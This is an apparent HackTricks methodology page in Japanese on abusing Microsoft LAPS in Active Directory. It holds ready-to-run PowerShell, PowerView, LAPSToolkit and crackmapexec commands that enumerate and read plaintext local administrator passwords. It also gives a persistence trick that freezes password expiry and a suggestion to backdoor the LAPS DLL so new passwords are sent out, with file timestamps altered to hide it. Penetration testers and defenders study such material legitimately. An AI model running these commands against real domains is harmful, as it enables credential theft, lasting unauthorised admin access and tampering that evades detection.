hacktricks/windows-hardening/active-directory-methodology/laps.md

10 KiB
Raw Blame History

LAPS

ゼロからヒーローまでAWSハッキングを学ぶ htARTEHackTricks AWS Red Team Expert

基本情報

ローカル管理者パスワードソリューションLAPSは、管理者パスワード一意でランダムで頻繁に変更されるドメイン参加コンピュータに適用されるシステムを管理するために使用されるツールです。これらのパスワードは、Active Directory内に安全に保存され、アクセス制御リストACLを介して許可されたユーザーのみがアクセスできます。クライアントからサーバーへのパスワードの送信のセキュリティは、Kerberosバージョン5と**Advanced Encryption StandardAES**の使用によって保証されています。

LAPSの実装により、ドメインのコンピュータオブジェクトには、ms-mcs-AdmPwdms-mcs-AdmPwdExpirationTimeという2つの新しい属性が追加されます。これらの属性は、平文の管理者パスワードその有効期限をそれぞれ格納します。

アクティブ化されているかどうかを確認

reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled

dir "C:\Program Files\LAPS\CSE"
# Check if that folder exists and contains AdmPwd.dll

# Find GPOs that have "LAPS" or some other descriptive term in the name
Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl

# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property)
Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname

LAPS パスワードアクセス

\\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol から LAPS ポリシーの生データをダウンロードし、次に GPRegistryPolicyParser パッケージの Parse-PolFile を使用してこのファイルを人間が読める形式に変換できます。

さらに、ネイティブ LAPS PowerShell cmdlet は、アクセス可能なマシンにインストールされている場合に使用できます:

Get-Command *AdmPwd*

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Cmdlet          Find-AdmPwdExtendedRights                          5.0.0.0    AdmPwd.PS
Cmdlet          Get-AdmPwdPassword                                 5.0.0.0    AdmPwd.PS
Cmdlet          Reset-AdmPwdPassword                               5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdAuditing                                 5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdComputerSelfPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdReadPasswordPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdResetPasswordPermission                  5.0.0.0    AdmPwd.PS
Cmdlet          Update-AdmPwdADSchema                              5.0.0.0    AdmPwd.PS

# List who can read LAPS password of the given OU
Find-AdmPwdExtendedRights -Identity Workstations | fl

# Read the password
Get-AdmPwdPassword -ComputerName wkstn-2 | fl

PowerViewを使用して、誰がパスワードを読み取ることができ、それを読み取ることができるかを調べることもできます。

# Find the principals that have ReadPropery on ms-Mcs-AdmPwd
Get-AdmPwdPassword -ComputerName wkstn-2 | fl

# Read the password
Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd

LAPSToolkit

LAPSToolkitは、複数の機能を備えたLAPSの列挙を容易にします。
そのうちの1つは、LAPSが有効になっているすべてのコンピューターのExtendedRightsを解析することです。これにより、LAPSパスワードを読む権限を特定のグループに委任していることがわかります。
ドメインにコンピューターを参加させたアカウントは、そのホストに対してAll Extended Rightsを受け取り、この権限によりパスワードを読む能力が与えられます。列挙により、ユーザーアカウントがホスト上のLAPSパスワードを読むことができることが示されるかもしれません。これにより、特定のADユーザーを特定でき、LAPSパスワードを読むことができるユーザーを特定できます。

# Get groups that can read passwords
Find-LAPSDelegatedGroups

OrgUnit                                           Delegated Groups
-------                                           ----------------
OU=Servers,DC=DOMAIN_NAME,DC=LOCAL                DOMAIN_NAME\Domain Admins
OU=Workstations,DC=DOMAIN_NAME,DC=LOCAL           DOMAIN_NAME\LAPS Admin

# Checks the rights on each computer with LAPS enabled for any groups
# with read access and users with "All Extended Rights"
Find-AdmPwdExtendedRights
ComputerName                Identity                    Reason
------------                --------                    ------
MSQL01.DOMAIN_NAME.LOCAL    DOMAIN_NAME\Domain Admins   Delegated
MSQL01.DOMAIN_NAME.LOCAL    DOMAIN_NAME\LAPS Admins     Delegated

# Get computers with LAPS enabled, expirations time and the password (if you have access)
Get-LAPSComputers
ComputerName                Password       Expiration
------------                --------       ----------
DC01.DOMAIN_NAME.LOCAL      j&gR+A(s976Rf% 12/10/2022 13:24:41

Crackmapexecを使用してLAPSパスワードをダンプする

PowerShellへのアクセスがない場合、LDAPを介してこの特権を乱用することができます。

crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps

LAPS Persistence

有効期限日

管理者権限を取得すると、パスワードを取得し、有効期限日を将来に設定することで、マシンがパスワードを更新するのを防ぐことが可能です。

# Get expiration time
Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime

# Change expiration time
## It's needed SYSTEM on the computer
Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}

{% hint style="warning" %} 管理者が**Reset-AdmPwdPasswordコマンドレットを使用するか、LAPS GPOでポリシーで必要な以上のパスワード有効期限を許可しない**が有効になっている場合、パスワードはリセットされます。 {% endhint %}

バックドア

LAPSの元のソースコードはこちらで見つけることができます。そのため、コード内(たとえばMain/AdmPwd.PS/Main.csGet-AdmPwdPasswordメソッド内)にバックドアを設置して、新しいパスワードを何らかの方法で外部に送信したりどこかに保存することが可能です。

その後、新しいAdmPwd.PS.dllをコンパイルして、C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dllにアップロードします(および変更日時を変更します)。

参考文献

htARTEHackTricks AWS Red Team ExpertでAWSハッキングをゼロからヒーローまで学ぶ こちら